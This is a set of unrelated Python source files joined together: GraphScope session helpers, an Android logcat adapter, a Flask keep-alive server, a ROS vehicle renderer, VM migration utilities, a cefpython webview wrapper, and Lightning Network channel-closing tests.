if interactive_query.status == InteractiveQueryStatus.Failed:
raise InteractiveEngineInternalError(interactive_query.error_msg)
# Initializing.
# while True is ok, as the status is either running or failed eventually after timeout.
while True:
time.sleep(1)
if interactive_query.status == InteractiveQueryStatus.Failed:
raise InteractiveEngineInternalError(interactive_query.error_msg)
if interactive_query.status == InteractiveQueryStatus.Running:
return interactive_query
if not graph.graph_type == graph_def_pb2.ARROW_PROPERTY:
raise InvalidArgumentError("The graph should be a property graph.")
if self.eager():
if not graph.loaded():
raise InvalidArgumentError("The graph has already been unloaded")
# cache the instance of interactive query in eager mode
interactive_query = InteractiveQuery()
self._interactive_instance_dict[graph.vineyard_id] = interactive_query
try:
_wrapper = self._wrapper(
InteractiveQueryDAGNode(self, graph, engine_params)
)
except Exception as e:
if self.eager():
interactive_query.status = InteractiveQueryStatus.Failed
interactive_query.error_msg = str(e)
raise InteractiveEngineInternalError(str(e)) from e
else:
if self.eager():
interactive_query = _wrapper
graph._attach_interactive_instance(interactive_query)
return _wrapper
def learning(self, graph, nodes=None, edges=None, gen_labels=None):
"""Start a graph learning engine.
Note that this method has been deprecated, using `graphlearn` replace.
"""
warnings.warn(
"The method 'learning' has been deprecated, using graphlearn replace."
)
return self.graphlearn(graph, nodes, edges, gen_labels)
def graphlearn(self, graph, nodes=None, edges=None, gen_labels=None):
"""Start a graph learning engine.
Args:
nodes (list): The node types that will be used for gnn training.
edges (list): The edge types that will be used for gnn training.
gen_labels (list): Extra node and edge labels on original graph for gnn training.
Returns:
:class:`graphscope.learning.GraphDAGNode`:
An instance of learning graph that could be feed to the learning engine, evaluated in eager node.
"""
if self._session_id != graph.session_id:
raise RuntimeError(
"Failed to create learning engine on the graph with different session: {0} vs {1}".format(
self._session_id, graph.session_id
)
)
if (
self.eager()
and graph.vineyard_id in self._learning_instance_dict
and self._learning_instance_dict[graph.vineyard_id] is not None
):
return self._learning_instance_dict[graph.vineyard_id]
if not graph.graph_type == graph_def_pb2.ARROW_PROPERTY:
raise InvalidArgumentError("The graph should be a property graph.")
if self.eager():
if not graph.loaded():
raise InvalidArgumentError("The graph has already been unloaded")
from graphscope.learning.graph import GraphDAGNode as LearningGraphDAGNode
_wrapper = self._wrapper(
LearningGraphDAGNode(self, graph, nodes, edges, gen_labels)
)
if self.eager():
self._learning_instance_dict[graph.vineyard_id] = _wrapper
graph._attach_learning_instance(_wrapper)
return _wrapper
def nx(self):
if not self.eager():
raise RuntimeError(
"Networkx module need the session to be eager mode. "
"Current session is lazy mode."
)
if self._nx:
return self._nx
import importlib.util
spec = importlib.util.find_spec("graphscope.nx")
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
graph = type("Graph", (mod.Graph.__base__,), dict(mod.Graph.__dict__))
digraph = type("DiGraph", (mod.DiGraph.__base__,), dict(mod.DiGraph.__dict__))
setattr(graph, "_session", self)
setattr(digraph, "_session", self)
setattr(mod, "Graph", graph)
setattr(mod, "DiGraph", digraph)
self._nx = mod
return self._nx
session = Session
def set_option(**kwargs):
"""Set the value of specified options.
Find params detail in :class:`graphscope.Session`
Available options:
- num_workers
- log_level
- show_log
- vineyard_shared_mem
- k8s_namespace
- k8s_service_type
- k8s_gs_image
- k8s_etcd_image
- k8s_image_pull_policy
- k8s_image_pull_secrets
- k8s_coordinator_cpu
- k8s_coordinator_mem
- k8s_vineyard_daemonset
- k8s_vineyard_cpu
- k8s_vineyard_mem
- k8s_engine_cpu
- k8s_engine_mem
- k8s_mars_worker_cpu
- k8s_mars_worker_mem
- k8s_mars_scheduler_cpu
- k8s_mars_scheduler_mem
- with_mars
- k8s_volumes
- k8s_waiting_for_delete
- engine_params
- initializing_interactive_engine
- timeout_seconds
Args:
kwargs: dict
kv pair of GraphScope config you want to set.
Raises:
ValueError: If no such option exists.
Returns: None
"""
# check exists
for k, v in kwargs.items():
if not hasattr(gs_config, k):
raise ValueError(f"No such option {k} exists.")
for k, v in kwargs.items():
setattr(gs_config, k, v)
GSLogger.update()
def get_option(key):
"""Get the value of specified option.
Find params detail in :class:`graphscope.Session`
Available options:
- num_workers
- log_level
- show_log
- vineyard_shared_mem
- k8s_namespace
- k8s_service_type
- k8s_gs_image
- k8s_etcd_image
- k8s_image_pull_policy
- k8s_image_pull_secrets
- k8s_coordinator_cpu
- k8s_coordinator_mem
- k8s_vineyard_daemonset
- k8s_vineyard_cpu
- k8s_vineyard_mem
- k8s_engine_cpu
- k8s_engine_mem
- k8s_mars_worker_cpu
- k8s_mars_worker_mem
- k8s_mars_scheduler_cpu
- k8s_mars_scheduler_mem
- with_mars
- k8s_volumes
- k8s_waiting_for_delete
- engine_params
- initializing_interactive_engine
- timeout_seconds
Args:
key: str
Key of GraphScope config you want to get.
Raises:
ValueError: If no such option exists.
Returns: result: the value of the option
"""
if hasattr(gs_config, key):
return getattr(gs_config, key)
raise ValueError("No such option {} exists.".format(key))
def default_session(session):
"""Python's :code:`with` handler for defining a default session.
This function provides a means of registering a session for handling
and code that need a default session calls.
The :code:`with` keyword to specify that code invocations within
the scope of a block should be executed by a particular session.
Args:
session: :class:`Session`
The session to be installed as the default session.
Returns:
A context manager for the default session.
"""
return _default_session_stack.get_controller(session)
def get_default_session():
"""Returns the default session for the current context.
Raises:
RuntimeError: Default session is not exist.
Returns:
The default :class:`Session`.
"""
return _default_session_stack.get_default()
def get_session_by_id(handle):
"""Return the session by handle."""
if handle not in _session_dict:
raise ValueError("Session {} not exists.".format(handle))
return _session_dict.get(handle)
class _DefaultSessionStack(object):
"""A stack of objects for providing implicit defaults."""
def __init__(self):
super().__init__()
self.stack = []
def get_default(self):
if not self.stack:
logger.info("Creating default session ...")
sess = session(cluster_type="hosts", num_workers=1)
sess.as_default()
return self.stack[-1]
def reset(self):
self.stack = []
def is_cleared(self):
return not self.stack
@contextlib.contextmanager
def get_controller(self, default):
"""A context manager for manipulating a default stack."""
self.stack.append(default)
try:
yield default
finally:
# stack may be empty if reset() was called
if self.stack:
self.stack.remove(default)
_default_session_stack = _DefaultSessionStack() # pylint: disable=protected-access
def g(incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
"""Construct a GraphScope graph object on the default session.
It will launch and set a session to default when there is no default session found.
See params detail in :class:`graphscope.framework.graph.GraphDAGNode`
Returns:
:class:`graphscope.framework.graph.GraphDAGNode`: Evaluated in eager mode.
Examples:
.. code:: python
>>> import graphscope
>>> g = graphscope.g()
>>> import graphscope
>>> sess = graphscope.session()
>>> sess.as_default()
>>> g = graphscope.g() # creating graph on the session "sess"
"""
return get_default_session().g(incoming_data, oid_type, directed, generate_eid)
def gremlin(graph, engine_params=None):
"""Create a interactive engine and get the handler to execute the gremlin queries.
See params detail in :meth:`graphscope.Session.gremlin`
Returns:
:class:`graphscope.interactive.query.InteractiveQueryDAGNode`:
InteractiveQuery to execute gremlin queries, evaluated in eager mode.
Examples:
.. code:: python
>>> import graphscope
>>> g = graphscope.g()
>>> interactive_query = graphscope.gremlin()
"""
if _default_session_stack.is_cleared():
raise RuntimeError("No default session found.")
return get_default_session().gremlin(graph, engine_params)
def graphlearn(graph, nodes=None, edges=None, gen_labels=None):
"""Create a graph learning engine.
See params detail in :meth:`graphscope.Session.learning`
Returns:
:class:`graphscope.learning.GraphDAGNode`:
An instance of learning graph that could be feed to the learning engine, evaluated in eager node.
Example:
.. code:: python
>>> import graphscope
>>> g = graphscope.g()
>>> lg = graphscope.learning(g)
"""
if _default_session_stack.is_cleared():
raise RuntimeError("No de fault session found.")
return get_default_session().graphlearn(graph, nodes, edges, gen_labels)
|
logcat.py | import subprocess
import logging
from .adapter import Adapter
class Logcat(Adapter):
"""
A connection with the target device through logcat.
"""
def __init__(self, device=None):
"""
initialize logcat connection
:param device: a Device instance
"""
self.logger = logging.getLogger(self.__class__.__name__)
if device is None:
from droidbot.device import Device
device = Device()
self.device = device
self.connected = False
self.process = None
if device.output_dir is None:
self.out_file = None
else:
self.out_file = "%s/logcat.txt" % device.output_dir
def connect(self):
#self.device.adb.run_cmd("logcat -c")
self.process = subprocess.Popen(["adb", "-s", self.device.serial, "logcat", "-v", "threadtime"],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
import threading
listen_thread = threading.Thread(target=self.handle_output)
listen_thread.start()
def disconnect(self):
self.connected = False
if self.process is not None:
self.process.terminate()
def check_connectivity(self):
return self.connected
def handle_output(self):
self.connected = True
f = None
if self.out_file is not None:
f = open(self.out_file, 'w', encoding='utf-8')
while self.connected:
if self.process is None:
continue
line = self.process.stdout.readline()
if not isinstance(line, str):
line = line.decode()
self.parse_line(line)
if f is not None:
f.write(line)
if f is not None:
f.close()
print("[CONNECTION] %s is disconnected" % self.__class__.__name__)
def parse_line(self, logcat_line):
pass
|
keep_alive.py | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "My existence depends on pings!"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start() |
render_environment.py | #!usr/env/bin/python
import rospy
import time
import random
import tf
import numpy as np
from threading import Thread
from visualization_msgs.msg import *
from simulation.msg import *
from simulation.srv import *
from geometry_msgs.msg import Point
rospy.init_node("Render")
rviz = rospy.Publisher("visualization_msgs", Marker, queue_size=0, latch=True)
speed = 0.1
current_time = [0]
path_resolution = 5
parking_times = []
returning_times = []
vehicles = []
# class which takes care of all the aspects of a vehicle
class Car:
def __init__(self, vehicle_id, path, size):
# set the markers associated with this vehicle
self.vehicle_marker = Marker()
self.vehicle_marker.action = Marker.ADD
self.destination_marker = Marker()
self.path_marker = Marker()
self.vehicle_marker.type = Marker.CUBE
self.destination_marker.type = Marker.CYLINDER
self.path_marker.type = Marker.LINE_STRIP
self.vehicle_marker.ns = "Vehicle"
self.destination_marker.ns = "Markers"
self.path_marker.ns = "Path"
self.state = "idle"
self.vehicle_marker.color.a = 1
self.destination_marker.color.a = 1
self.path_marker.color.a = 1
self.color = [round(random.random(), 2) for _ in range(0, 3)]
self.id = vehicle_id
self.vehicle_path = path
self.motion_start = 0
self.motion_current = current_time
self.motion = 0
self.path_index = 0
self.interpolated_path = []
self.vehicle_marker.id = vehicle_id
self.destination_marker.id = vehicle_id
self.path_marker = vehicle_id
self.vehicle_marker.color.r, self.vehicle_marker.color.g, self.vehicle_marker.color.b = self.color
self.destination_marker.color.r, self.destination_marker.color.g, self.destination_marker.color.b = self.color
self.path_marker.color.r, self.path_marker.color.g, self.path_marker.color.b = self.color
self.vehicle_marker.scale.x, self.vehicle_marker.scale.y, self.vehicle_marker.scale.z = [size, 0.4, 0.5]
self.destination_marker.scale.x, self.destination_marker.scale.y, self.destination_marker.scale.z = [size, size, 0.1]
self.destination_marker.scale.x = 1
self.vehicle_marker.pose.orientation.x, self.vehicle_marker.pose.orientation.y, self.vehicle_marker.pose.orientation.z, self.vehicle_marker.pose.orientation.w = [0, 0, 0, 1]
self.destination_marker.pose.orientation.x, self.destination_marker.pose.orientation.y, self.destination_marker.pose.orientation.z, self.destination_marker.pose.orientation.w = [0, 0, 0, 1]
self.vehicle_marker.pose.position.x, self.vehicle_marker.pose.position.y, self.vehicle_marker.pose.position.z = [0, 0, 0]
self.destination_marker.pose.position.x, self.destination_marker.pose.position.y, self.destination_marker.pose.position.z = [0, 0, 0]
def quatfromang(self, yaw):
# get quaternion for euler angles
return tf.transformations.quaternion_from_euler(0, 0, yaw)
def move(self):
# update the state of the vehicle
self.path_index = int((self.motion_current[0] - self.motion_start)/0.1)
if self.path_index >= len(self.interpolated_path):
self.vehicle_marker.pose.position.x, self.vehicle_marker.pose.position.y = self.interpolated_path[-1][0:2]
self.vehicle_marker.pose.orientation.x, self.vehicle_marker.pose.orientation.y, self.vehicle_marker.pose.orientation.z, self.vehicle_marker.pose.orientation.w = self.quatfromang(self.interpolated_path[-1][2])
self.clear_path()
else:
self.vehicle_marker.pose.position.x, self.vehicle_marker.pose.position.y = self.interpolated_path[self.path_index][0:2]
self.vehicle_marker.pose.orientation.x, self.vehicle_marker.pose.orientation.y, self.vehicle_marker.pose.orientation.z, self.vehicle_marker.pose.orientation.w = self.quatfromang(self.interpolated_path[self.path_index][2])
self.vehicle_path.points = self.vehicle_path.points[int(self.path_index/path_resolution):-1]
def interpolate(self):
# add intermediate steps for smooth motion
for i in range(0, len(self.vehicle_path)):
if self.vehicle_path[i][2] != self.vehicle_path[i+1][2]:
self.interpolated_path += []
else:
steps = int(np.linalg.norm(np.array(self.vehicle_path[i+1][0:2]) - np.array(self.vehicle_path[i][0:2]))/speed)
xspan = [round(val, 2) for val in np.linspace(self.vehicle_path[i][0], self.vehicle_path[i+1][0], steps)]
yspan = [round(val, 2) for val in np.linspace(self.vehicle_path[i][1], self.vehicle_path[i+1][1], steps)]
heading = self.vehicle_path[i][2] * steps
self.interpolated_path += zip(xspan, yspan, heading)
def draw_path(self, path, state):
# draw the path of the vehicle on RViz
self.vehicle_path = path
self.destination_marker.action = Marker.ADD
self.path_marker.action = Marker.ADD
self.motion = 1
self.motion_start = time.time()
self.interpolate()
self.state = state
pts = Point()
pts.z = 0
for i in range(0, len(self.interpolated_path), path_resolution):
pts.x = self.interpolated_path[i][0]
pts.y = self.interpolated_path[i][1]
self.vehicle_path.points.append(pts)
def clear_path(self):
# clear the path of the vehicle
if self.state == "parking":
parking_times.append(len(self.interpolated_path)/speed)
self.state = "idle"
elif self.state == "returning":
returning_times.append(len(self.interpolated_path)/speed)
self.clear()
self.state = "clear"
self.vehicle_path = []
self.interpolated_path = []
self.motion_start = 0
self.motion = 0
self.path_marker.action = Marker.DELETE
self.destination_marker.action = Marker.DELETE
def clear(self):
# publish a message to remove the vehicle
self.vehicle_marker.action = Marker.DELETE
def service_response(self):
return self.interpolated_path[self.path_index]
def vehicle_state(data):
if data.flag == "ADD":
a = Car(data.id, data.path, data.size)
vehicles.append(a)
elif data.flag == "UPDATE":
vehicles[data.id].draw_path(data.path)
def global_state(req):
pass
def local_state(req):
pass
def update():
rospy.Subscriber("render_push", vehicle_update, vehicle_state)
global_service = rospy.Service("global_state", state_global, global_state)
local_service = rospy.Service("local_state", state_local, local_state)
rospy.spin()
# have a custom message of line, cylinder marker, and a cube marker in each object of the class
# keep on updating the positions based on motion flag
def draw():
global current_time
while True:
current_time[0] = time.time()
for car in vehicles:
if car.motion:
car.move()
access = Thread(target=update)
render = Thread(target=draw)
access.start()
render.start()
|
utils.py | # Copyright (c) 2019 Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import yaml
import math
# from os import listdir
# from os.path import isfile, join
import os
from glob import glob
from lxml import etree
from multiprocessing import Process
import subprocess
def read_ids_from_file(id_file):
with open(id_file, 'r') as fimage:
list_ids = fimage.readlines()
#print list_ids
fimage.closed
ids = []
for i in list_ids:
if i and i.strip():
uuid = i.split()[0]
#print uuid
ids.append(uuid)
return ids
def read_ids_with_hyps_file(id_file):
with open(id_file, 'r') as fimage:
list_ids = fimage.readlines()
fimage.closed
ids = []
for i in list_ids:
if i and i.strip():
uuid = i.split()[0]
hyp = i.split()[1]
pair = {'uuid': uuid, 'hyp': hyp}
ids.append(pair)
return ids
def load(filename):
"""Load a dictionary from a yaml file.
Expects the file at filename to be a yaml file.
Returns the parsed configuration as a dictionary.
:param filename: Name of the file
:type filename: String
:return: Loaded configuration
:rtype: Dict
"""
with open(filename, 'r') as f:
return yaml.safe_load(f)
def get_nfs_location(dir, volume_id):
# for f in listdir(dir):
# if isfile(join(dir, f)):
# print f
# else:
# for root, d_names, f_names in os.walk(dir):
# print root, d_names, f_names
fname = []
for root, d_names, f_names in os.walk(dir):
for f in f_names:
if volume_id == f:
#print os.path.join(root, f)
# print root
# print f
return root
#will round up to the nearest gb:
#base 1024
def convert_B_to_GB(bytes):
gig = math.pow(1024, 3)
convert_gb = math.ceil(bytes / gig)
return int(convert_gb)
# Get macs from libvirt file. Needed for proper nic ordering on boot.
def get_macs_from_libvirt(full_path):
print "libvirt in: " + full_path
tree = etree.parse(full_path + '/libvirt.xml')
root = tree.getroot()
interfaces = root.findall('./devices/interface/mac')
macs = []
for interface in interfaces:
macs.append(interface.get('address'))
# print macs
return macs
def copy_file(full_path, file_name, new_name):
print "Copying " + full_path + file_name + " to " + full_path + new_name
# copy2(full_path + file_name, full_path + new_name)
subprocess.call(["cp", "--sparse=always", full_path + file_name, full_path + new_name])
def start_copy_process(full_path, file_name, new_name):
p = Process(target=copy_file, args=(full_path, file_name, new_name))
p.start() |
core.py | # -*- coding: utf-8 -*-
import os, sys, typing, threading
import tkinter as tk
from cefpython3 import cefpython as cef
from .assets import base_icon_file, base_js_file
class BrowserAPI:
"""
BrowserAPI base class
func execute_javascript: execute javascript code in webview
func execute_function: execute defined javascript function in webview
"""
def __init__(self, browser_window, browser):
self.window:BrowserWindow = browser_window
self.__browser = browser
def execute_javascript(self, js_script):
"""
execute javascript in webview
:param js_script: javascript script to execute
"""
self.__browser.ExecuteJavascript(js_script)
def execute_function(self, name:str, *args):
"""
execute defined javascript function in webview
:param name: name of javascript function to execute
:param args: arguments for javascript function
"""
self.__browser.ExecuteFunction(name, *args)
class BrowserWindow(tk.Toplevel):
"""
BrowserWindow class
:param url: url to show in webview. file, http url available
:param js_api: javascript api for webview. inherits from 'BrowserAPI'
:param title: webview window title
:param icon: webview window title.
:param width: width of window.
:param height: height of window.
:param x: x position of window.
:param y: y position of window.
event on_load: function to trigger on webview page is loaded
event on_close: function to trigger on webview window is closed
"""
debug:bool = False
class BrowserWindowHandler:
def __init__(self, browser_window):
self.browser_window:BrowserWindow = browser_window
def OnLoadingStateChange(self, browser, is_loading, **_):
if not is_loading:
if sys.platform == "win32":
self.browser_window.geometry(f"{self.browser_window.wb_width}x{self.browser_window.wb_height}+{self.browser_window.wb_x}+{self.browser_window.wb_y}")
self.browser_window.on_load(browser)
def __init__(self, url:str, js_api_cls:typing.Union[BrowserAPI, typing.List[BrowserAPI]], title:str, icon:str, width:int, height:int, x:int, y:int):
super().__init__()
self.__is_cef_init = False
self.__js_api_cls = js_api_cls
self.icon = base_icon_file if icon is None else os.path.realpath(icon)
if url.startswith("http://") or url.startswith("https://"):
self.url = url
elif url.startswith("file://"):
self.url = "file://" + os.path.realpath(url[7:])
else:
self.url = "file://" + os.path.realpath(url)
self.title(title)
self.iconphoto(False, tk.PhotoImage(file = self.icon))
width, height = int(width), int(height)
if x == -1:
x = int((self.winfo_screenwidth() - width) / 2)
else:
x = int(x)
if y == -1:
y = int((self.winfo_screenheight() - height) / 2)
else:
y = int(y)
self.wb_width, self.wb_height, self.wb_x, self.wb_y = width, height, x, y
if not sys.platform == "win32":
self.geometry(f"{width}x{height}+{x}+{y}")
self.bind("<Configure>", self.__on_tk_configure)
self.protocol("WM_DELETE_WINDOW", self.__on_tk_close)
Application.windows.insert(0, self)
def show_devtools(self):
"""
show devtools
"""
self.__browser.ShowDevTools()
self.focus()
def close_devtools(self):
"""
close devtools
"""
self.__browser.CloseDevTools()
def register_js_api(self, js_api_cls:BrowserAPI):
"""
register additional BrowserAPI class
:param js_api_cls: BrowserAPI inherited api class
"""
if js_api_cls is not None:
js_api = js_api_cls(self, self.__browser)
self.register_object(js_api.__class__.__name__, js_api)
def register_object(self, name, object):
self.__bindings.SetObject(name, object)
self.__bindings.Rebind()
def on_load(self, browser):
pass
def on_close(self, browser):
pass
def __on_tk_configure(self, _):
if not self.__is_cef_init:
self.__is_cef_init = True
winfo = cef.WindowInfo()
if sys.platform == "win32":
geometry = [ 0, 0, self.wb_width, self.wb_height ]
else:
geometry = [ 0, 0, self.winfo_width(), self.winfo_height() ]
winfo.SetAsChild(self.__get_handle(), geometry)
self.__browser = browser = cef.CreateBrowserSync(winfo, url = self.url)
assert browser
self.__bindings = bindings = cef.JavascriptBindings(bindToFrames = False, bindToPopups = False)
browser.SetJavascriptBindings(bindings)
if isinstance(self.__js_api_cls, list):
for api_cls in self.__js_api_cls:
self.register_js_api(api_cls)
else:
self.register_js_api(self.__js_api_cls)
browser.SetClientHandler(BrowserWindow.BrowserWindowHandler(self))
if self.debug:
self.show_devtools()
# threading.Thread(target = self.__on_load).start()
self.__cef_loop()
def __on_tk_close(self):
Application.windows.remove(self)
self.on_close(self.__browser)
self.__browser.CloseBrowser(True)
self.destroy()
if len(Application.windows) == 0:
self.master.destroy()
def __get_handle(self):
if sys.platform == "darwin":
from AppKit import NSApp
import objc
tk_windows = [ win for win in NSApp.windows() if str(win).startswith("<TKWindow: ") ][:-1]
mac_self = tk_windows[Application.windows.index(self)]
return objc.pyobjc_id(mac_self.contentView())
else:
return self.winfo_id()
def __cef_loop(self):
try:
cef.MessageLoopWork()
self.after(5, self.__cef_loop)
except:
pass
class Application(tk.Tk):
"""
Base Application environment for webview
:param settings: dictionary type of environment settings
more details in "https://github.com/cztomczak/cefpython/blob/master/api/ApplicationSettings.md"
"""
windows:typing.List[BrowserWindow] = []
def __init__(self, settings:dict = {}, **kwargs):
super().__init__(**kwargs)
self.withdraw()
if sys.platform == "darwin":
settings["external_message_pump"] = True
sys.excepthook = cef.ExceptHook
cef.Initialize(settings)
def run(self, on_stop:object = None):
"""
run webview environment
:param on_stop: function when environment stopped
"""
self.mainloop()
cef.Shutdown()
if on_stop:
on_stop()
|
test_closing.py | from fixtures import * # noqa: F401,F403
from lightning import RpcError
from utils import only_one, sync_blockheight, wait_for, DEVELOPER, TIMEOUT, VALGRIND, SLOW_MACHINE
import queue
import pytest
import re
import threading
import unittest
@unittest.skipIf(not DEVELOPER, "Too slow without --dev-bitcoind-poll")
def test_closing(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
bitcoind.generate_block(5)
# Only wait for the channels to activate with DEVELOPER=1,
# otherwise it's going to take too long because of the missing
# --dev-broadcast-interval
if DEVELOPER:
wait_for(lambda: len(l1.getactivechannels()) == 2)
wait_for(lambda: len(l2.getactivechannels()) == 2)
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
# This may either be from a local_update or an announce, so just
# check for the substring
assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
# This should return with an error, then close.
with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
l1.rpc.close(chan, False, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: len(l2.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(bitcoind.rpc.getrawmempool(False))
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi for tx:{}'.format(closetxid),
]
bitcoind.generate_block(1)
l1.daemon.wait_for_log(r'Owning output .* txid %s' % closetxid)
l2.daemon.wait_for_log(r'Owning output .* txid %s' % closetxid)
# Make sure both nodes have grabbed their close tx funds
assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi for tx:{}'.format(closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
])
bitcoind.generate_block(9)
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi for tx:{}'.format(closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
])
# Make sure both have forgotten about it
bitcoind.generate_block(90)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_while_disconnected(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
l2.stop()
# The close should still be triggered afterwards.
with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
l1.rpc.close(chan, False, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.start()
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(101)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_id(node_factory):
"""Test closing using peer ID and full channel ID
"""
l1, l2 = node_factory.get_nodes(2)
# Close by full channel ID.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
l2.rpc.close(cid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
# Close by peer ID.
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.daemon.wait_for_log("Handed peer, entering loop")
l2.fund_channel(l1, 10**6)
pid = l1.info['id']
l2.rpc.close(pid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@unittest.skipIf(not DEVELOPER, "needs dev-rescan-outputs")
def test_closing_torture(node_factory, executor, bitcoind):
l1, l2 = node_factory.get_nodes(2)
amount = 10**6
# Before the fix was applied, 15 would often pass.
# However, increasing the number of tries would
# take longer in VALGRIND mode, triggering a CI
# failure since the test does not print any
# output.
# On my laptop, VALGRIND is about 4x slower than native, hence
# the approximations below:
iterations = 50
if VALGRIND:
iterations //= 4
if SLOW_MACHINE:
iterations //= 2
for i in range(iterations):
# Reduce probability that spurious sendrawtx error will occur
l1.rpc.dev_rescan_outputs()
# Create a channel.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, amount)
scid = l1.get_channel_scid(l2)
# Get it confirmed.
l1.bitcoin.generate_block(6)
# Wait for it to go to CHANNELD_NORMAL
l1.wait_channel_active(scid)
l2.wait_channel_active(scid)
# Start closers: can take a long time under valgrind!
c1 = executor.submit(l1.rpc.close, l2.info['id'], False, 60)
c2 = executor.submit(l2.rpc.close, l1.info['id'], False, 60)
# Wait for close to finish
c1.result(TIMEOUT)
c2.result(TIMEOUT)
wait_for(lambda: len(bitcoind.rpc.getrawmempool(False)) == 1)
# Get close confirmed
l1.bitcoin.generate_block(100)
wait_for(lambda: len(l1.rpc.listpeers()['peers']) == 0)
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_closing_different_fees(node_factory, bitcoind, executor):
l1 = node_factory.get_node()
# Default feerate = 15000/7500/1000
# It will start at the second number, accepting anything above the first.
feerates = [[20000, 15000, 7400], [8000, 1001, 100]]
amounts = [0, 545999, 546000]
num_peers = len(feerates) * len(amounts)
addr = l1.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, 1)
numfunds = len(l1.rpc.listfunds()['outputs'])
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
# Create them in a batch, for speed!
peers = []
for feerate in feerates:
for amount in amounts:
p = node_factory.get_node(feerates=feerate)
p.feerate = feerate
p.amount = amount
l1.rpc.connect(p.info['id'], 'localhost', p.port)
peers.append(p)
for p in peers:
p.channel = l1.rpc.fundchannel(p.info['id'], 10**6, minconf=0)['channel_id']
# Technically, this is async to fundchannel returning.
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(6)
# Now wait for them all to hit normal state, do payments
l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
+ ['to CHANNELD_NORMAL'] * num_peers)
for p in peers:
if p.amount != 0:
l1.pay(p, 100000000)
# Now close all channels
# All closes occur in parallel, and on Travis,
# ALL those lightningd are running on a single core,
# so increase the timeout so that this test will pass
# when valgrind is enabled.
# (close timeout defaults to 30 as of this writing)
closes = [executor.submit(l1.rpc.close, p.channel, False, 90) for p in peers]
for c in closes:
c.result(90)
# close does *not* wait for the sendrawtransaction, so do that!
